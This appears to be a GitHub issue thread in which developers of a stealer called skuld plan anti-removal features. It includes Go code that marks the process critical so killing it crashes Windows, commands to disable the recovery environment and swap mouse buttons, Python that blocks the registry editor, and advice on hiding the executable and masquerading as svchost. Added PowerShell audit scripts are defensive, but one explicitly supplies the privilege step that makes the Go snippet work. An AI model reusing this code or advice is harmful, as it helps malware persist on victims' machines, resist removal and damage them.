Closed EvilBytecode closed 7 months ago
Can I add a feature soon like setting the process as critical? If someone tries to delete it or crash it, in a nutshell they wouldn't be able to, because if the process is in a critical state and they try to kill it, it will BSOD lol.
Feel free to make pull requests without hesitation.
Also kirby, if you add attributes on the startup (attrib +h +s), the exe won't be visible.
Previously, I had implemented this feature but removed it (https://github.com/hackirby/skuld/commit/51cacadf34b5d6a5b47813bcfa86e317914e9367) due to concerns that Windows might not start the program if it remained hidden. However, after conducting a recent test and confirming that it does start, I will now reintroduce this feature.
There are some ways; what do you think is the best one?
Either Rtl, or just two processes; you can mask it as svchost or conhost, ifyk.
RtlSetProcessIsCritical needs a UAC bypass in order to work.
```go
package main

import (
	"fmt"
	"syscall"
)

var (
	modNtDll                    = syscall.NewLazyDLL("ntdll.dll")
	procRtlSetProcessIsCritical = modNtDll.NewProc("RtlSetProcessIsCritical")
)

func main() {
	// RtlSetProcessIsCritical(NewValue, OldValue, CheckFlag): NewValue=1 marks this
	// process critical. It only succeeds when SeDebugPrivilege is enabled in the
	// token; the return value is an NTSTATUS (0 = success), so check it.
	status, _, _ := procRtlSetProcessIsCritical.Call(1, 0, 0)
	if status != 0 {
		fmt.Printf("RtlSetProcessIsCritical failed: NTSTATUS 0x%x\n", status)
	}
	// don't exit (or BSOD): a critical process that terminates bugchecks the machine
	var input string
	fmt.Scanln(&input)
}
```
The other method does not need administrative privileges, but... I'm not entirely convinced that triggering a BSOD would really be useful.
I think it would just be annoying x)
```cmd
rem swap the left and right mouse buttons
RUNDLL32.EXE USER32.DLL,SwapMouseButton
rem disable the Windows Recovery Environment (needs an elevated prompt)
reagentc.exe /disable
```
```python
from winreg import CreateKeyEx, SetValueEx, CloseKey, HKEY_CURRENT_USER, KEY_ALL_ACCESS, REG_DWORD

# Block regedit for the current user via the Explorer policy value.
# CreateKeyEx instead of OpenKey: the Policies\System key does not exist under
# HKCU on a fresh profile, and OpenKey would raise FileNotFoundError.
key = CreateKeyEx(HKEY_CURRENT_USER, r"Software\Microsoft\Windows\CurrentVersion\Policies\System", 0, KEY_ALL_ACCESS)
SetValueEx(key, "DisableRegistryTools", 0, REG_DWORD, 1)
CloseKey(key)
```
Disabling Task Manager and Registry Editor is a smart move. Also, putting the executable in a Critical Process state would be a good idea to enhance its protection against debugging.
I don't want to talk about skuld on Discord because I'm afraid of being termed. Unfortunately, I can't use Telegram, but you can reach me via this Matrix link: https://matrix.to/#/@hackirby:matrix.org
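The tampering discussed above (the `attrib +h +s` startup trick, the mouse-button swap, `reagentc /disable`, and the `DisableRegistryTools` / `DisableTaskMgr` policy values) is easy to check for from the defender's side. The script below is an added example, not code from skuld or from either poster. It assumes the dropped executable sits in one of the two Startup folders with Hidden+System attributes, that the policy values live under `...\Policies\System` in HKCU or HKLM (the snippet above writes HKCU because that needs no admin rights), and that `reagentc /info` prints English output containing "Windows RE status: Disabled". `-Fix` reverts what it finds; reverting HKLM values and re-enabling WinRE need an elevated shell.

```powershell
# Added example (not from skuld or either poster): report, and with -Fix undo,
# the persistence/anti-tamper tricks discussed in this issue.
param([switch]$Fix)

$policyKey    = 'Software\Microsoft\Windows\CurrentVersion\Policies\System'
$policyValues = 'DisableRegistryTools', 'DisableTaskMgr'

# P/Invoke SwapMouseButton so the swap can be undone with an explicit FALSE
# (rundll32 passes a non-NULL first argument, which is why the one-liner swaps).
Add-Type -Namespace Win32 -Name User32 -MemberDefinition @'
[DllImport("user32.dll")] public static extern bool SwapMouseButton(bool fSwap);
'@

function Get-TamperPolicy {
    # Both hives matter: HKCU is writable by the user, HKLM needs admin.
    foreach ($hive in 'HKCU', 'HKLM') {
        $path = "${hive}:\$policyKey"
        if (-not (Test-Path $path)) { continue }
        $props = Get-ItemProperty -Path $path
        foreach ($name in $policyValues) {
            $v = $props.$name
            if ($null -ne $v -and $v -ne 0) {
                [pscustomobject]@{ Hive = $hive; Name = $name; Data = $v }
            }
        }
    }
}

function Get-HiddenStartupItem {
    # attrib +h +s hides the file from a default Explorer/dir view; -Force lists it anyway.
    $dirs = @([Environment]::GetFolderPath('Startup'), [Environment]::GetFolderPath('CommonStartup'))
    foreach ($d in $dirs) {
        if (-not (Test-Path $d)) { continue }
        Get-ChildItem -Path $d -Force -File |
            Where-Object { $_.Attributes.HasFlag([IO.FileAttributes]::Hidden) -and
                           $_.Attributes.HasFlag([IO.FileAttributes]::System) }
    }
}

function Test-MouseSwapped {
    Add-Type -AssemblyName System.Windows.Forms
    [System.Windows.Forms.SystemInformation]::MouseButtonsSwapped   # GetSystemMetrics(SM_SWAPBUTTON)
}

function Test-WinReDisabled {
    # Assumption: English reagentc output.
    $out = (& reagentc.exe /info 2>$null) -join "`n"
    [bool]($out -match 'Windows RE status:\s+Disabled')
}

foreach ($f in Get-TamperPolicy) {
    Write-Warning "$($f.Hive)\$policyKey\$($f.Name) = $($f.Data) (regedit / Task Manager blocked by policy)"
    if ($Fix) { Remove-ItemProperty -Path "$($f.Hive):\$policyKey" -Name $f.Name }
}
foreach ($i in Get-HiddenStartupItem) {
    Write-Warning "hidden+system startup item: $($i.FullName)"
    if ($Fix) {
        # clear only Hidden and System so the file shows up again; leave it in place for triage
        $i.Attributes = $i.Attributes -band (-bnot ([IO.FileAttributes]::Hidden -bor [IO.FileAttributes]::System))
    }
}
if (Test-MouseSwapped) {
    Write-Warning 'mouse buttons are swapped'
    if ($Fix) { [void][Win32.User32]::SwapMouseButton($false) }
}
if (Test-WinReDisabled) {
    Write-Warning 'Windows Recovery Environment is disabled (reagentc)'
    if ($Fix) { & reagentc.exe /enable }
}
```

Run it as `.\audit.ps1` to report and `.\audit.ps1 -Fix` to revert. Note that if the policy values are set by a real Group Policy rather than by malware, the next `gpupdate` will put them back, so a value that keeps reappearing is worth checking against your GPOs before blaming a stealer.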
Okay, I'll check the Matrix. Anyways, I'll make code samples soon, and you can add them, but first I need to finish my other project... give me some hours. If you don't want to wait, just do it yourself; it's extremely simple 😄.
Check Matrix.
I understand. I'm quite busy myself. Take all the time you need.
I joined the chat and replied to your messages 👍
Hi, https://github.com/EvilBytecode/RtlSetProcessIsCritical/blob/main/CriticalProcess.go
I noticed your code for this feature is quite long. I've written a shorter version that achieves the same functionality in this issue. Perhaps we can review and compare our approaches?
Won't work because of AdjustTokenPrivileges.
You're right. My code used to work after elevating privileges when I tested it some time ago, but now it doesn't, whereas your code works perfectly.
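The privilege point the two of you just settled, and the earlier "needs a UAC bypass" remark, come down to one fact: RtlSetProcessIsCritical sets ProcessBreakOnTermination on the process, and that (like querying the flag on other processes) needs SeDebugPrivilege actually enabled in the token. An elevated admin token holds the privilege but disabled, so AdjustTokenPrivileges has to be called first; a non-admin token never holds it, and AdjustTokenPrivileges then still returns TRUE but sets ERROR_NOT_ALL_ASSIGNED. The script below is an added example, not code from skuld or from either poster: it enables SeDebugPrivilege the way a stealer would have to, then walks every process and reports which ones carry the critical flag, which is the check an incident responder wants when this feature is in play. Assumed constants: ProcessBreakOnTermination is information class 29, PROCESS_QUERY_INFORMATION is 0x0400, and the TOKEN_* / SE_PRIVILEGE_ENABLED values are the ones from the Windows headers.

```powershell
# Added example (not from skuld or either poster): enable SeDebugPrivilege, then
# list processes whose ProcessBreakOnTermination ("critical") flag is set.
# Run from an elevated shell; without elevation the privilege cannot be enabled.
$src = @'
using System;
using System.Runtime.InteropServices;
public static class NtProc {
    [StructLayout(LayoutKind.Sequential, Pack = 1)]
    public struct TokPriv1Luid { public int Count; public long Luid; public int Attr; }
    [DllImport("advapi32.dll", SetLastError = true)]
    public static extern bool OpenProcessToken(IntPtr h, int acc, ref IntPtr phtok);
    [DllImport("advapi32.dll", SetLastError = true)]
    public static extern bool LookupPrivilegeValue(string host, string name, ref long luid);
    [DllImport("advapi32.dll", SetLastError = true)]
    public static extern bool AdjustTokenPrivileges(IntPtr htok, bool disall,
        ref TokPriv1Luid newst, int len, IntPtr prev, IntPtr relen);
    [DllImport("kernel32.dll")]
    public static extern IntPtr GetCurrentProcess();
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern IntPtr OpenProcess(int access, bool inherit, int pid);
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool CloseHandle(IntPtr h);
    [DllImport("ntdll.dll")]
    public static extern int NtQueryInformationProcess(IntPtr h, int cls,
        ref uint info, int len, ref int retLen);
}
'@
Add-Type -TypeDefinition $src

function Enable-SeDebugPrivilege {
    # Returns $true only if the privilege is now enabled. AdjustTokenPrivileges
    # returns TRUE even when it assigned nothing; a token that never held the
    # privilege (non-admin) is reported via ERROR_NOT_ALL_ASSIGNED (1300).
    $TOKEN_ADJUST_PRIVILEGES = 0x20; $TOKEN_QUERY = 0x8; $SE_PRIVILEGE_ENABLED = 2
    $tok = [IntPtr]::Zero
    if (-not [NtProc]::OpenProcessToken([NtProc]::GetCurrentProcess(),
            ($TOKEN_ADJUST_PRIVILEGES -bor $TOKEN_QUERY), [ref]$tok)) { return $false }
    $luid = [long]0
    if (-not [NtProc]::LookupPrivilegeValue($null, 'SeDebugPrivilege', [ref]$luid)) { return $false }
    $tp = New-Object 'NtProc+TokPriv1Luid'
    $tp.Count = 1; $tp.Luid = $luid; $tp.Attr = $SE_PRIVILEGE_ENABLED
    $ok  = [NtProc]::AdjustTokenPrivileges($tok, $false, [ref]$tp, 0, [IntPtr]::Zero, [IntPtr]::Zero)
    $err = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
    [void][NtProc]::CloseHandle($tok)
    return ($ok -and $err -eq 0)
}

function Get-CriticalProcess {
    $PROCESS_QUERY_INFORMATION = 0x0400
    $ProcessBreakOnTermination = 29   # assumed info class number (NT headers)
    foreach ($p in Get-Process) {
        $crit = $null   # $null = could not be determined (access denied / protected process)
        $h = [NtProc]::OpenProcess($PROCESS_QUERY_INFORMATION, $false, $p.Id)
        if ($h -ne [IntPtr]::Zero) {
            try {
                $flag = [uint32]0; $ret = 0
                $status = [NtProc]::NtQueryInformationProcess($h, $ProcessBreakOnTermination, [ref]$flag, 4, [ref]$ret)
                if ($status -eq 0) { $crit = ($flag -ne 0) }
            } finally { [void][NtProc]::CloseHandle($h) }
        }
        [pscustomobject]@{
            ProcessId = $p.Id
            Name      = $p.ProcessName
            Critical  = $crit
            Path      = $(try { $p.Path } catch { $null })
        }
    }
}

if (-not (Enable-SeDebugPrivilege)) {
    Write-Warning 'SeDebugPrivilege not enabled (not elevated?): only processes you can already open are inspected'
}
# Windows marks a few of its own processes critical (csrss.exe, wininit.exe, ...);
# a critical process running from a user-writable path is the finding to chase.
Get-CriticalProcess | Where-Object { $_.Critical -ne $false } |
    Format-Table ProcessId, Name, Critical, Path -AutoSize
```

The output keeps rows whose flag is unknown as well as rows where it is set, because a process you cannot open at all is itself worth a second look. The same Enable-SeDebugPrivilege routine is the missing step in the Go snippet earlier in the thread: without it RtlSetProcessIsCritical returns a non-zero NTSTATUS and the process is simply not critical, which matches the "won't work" report above.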
Yes, yes.